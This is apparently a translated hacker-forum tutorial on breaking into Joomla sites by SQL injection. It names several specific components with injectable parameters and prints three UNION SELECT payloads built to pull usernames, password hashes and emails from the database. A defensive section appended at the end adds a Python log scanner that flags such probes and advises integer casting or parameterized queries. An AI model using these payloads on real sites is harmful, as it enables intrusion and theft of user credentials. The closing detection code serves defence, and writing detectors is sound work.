
Hack Joomla

Today let's hack Joomla. Come on, let's go..
You'll see something more or less like this:
index.php?option=com_blabla&category=5&Item=2

Parameters like these..
– cat, category, kat, categories, kats, cats
– id, userid, katid, catid
– sometimes also Item, entry, page
Example.. change category=5 to category='

Press Enter and look at the MySQL error that shows up on the Joomla site.
To show this more clearly.. here are a few examples I've found..
URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

So how's that? You'll have to explore more.. and rack your brains some more.. xD~
Since every Joomla site has the same database structure.. here are some more examples..
Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--
Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--
Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--
SQL injection with Joomla is really interesting once you know how.. You can look up as much of the database information in Joomla as you like.. See you again..
credit to: masta darkcruise
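
Seen from the defender's side, the pattern above (a normally numeric component parameter carrying a quote or a UNION SELECT) stands out in web server logs. The following Python scan is an added example, not part of the original post: the parameter list is taken from the post, while the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names the post lists as injection points, plus those in its
# example URLs. All normally carry a plain integer. Compared lowercased.
NUMERIC_PARAMS = {
    "cat", "category", "kat", "categories", "kats", "cats", "id", "userid",
    "katid", "catid", "item", "entry", "page", "mid", "cardid", "gp", "cid", "itemid",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

def classify(value):
    """Return None for a plain integer, otherwise a short reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    if "'" in value or '"' in value:
        return "quote-probe"
    return "non-integer"

def scan_line(line):
    """Return [(param, reason), ...] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("index.php"):
        return []
    findings = []
    # parse_qsl percent-decodes and maps '+' to a space, as PHP does.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reason = classify(value) if value else None
        if name.lower() in NUMERIC_PARAMS and reason:
            findings.append((name, reason))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_jp_jobs&view=detail&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_qpersonel&task=qpListele&katid=%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_qpersonel&task=qpListele&katid=2+AND+1=2+UNION+SELECT+1,2,3 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(entry.split()[0], scan_line(entry))
```

A hit is a triage lead rather than proof of compromise; on the application side the fix is to cast these parameters to integers or use parameterized queries in the component.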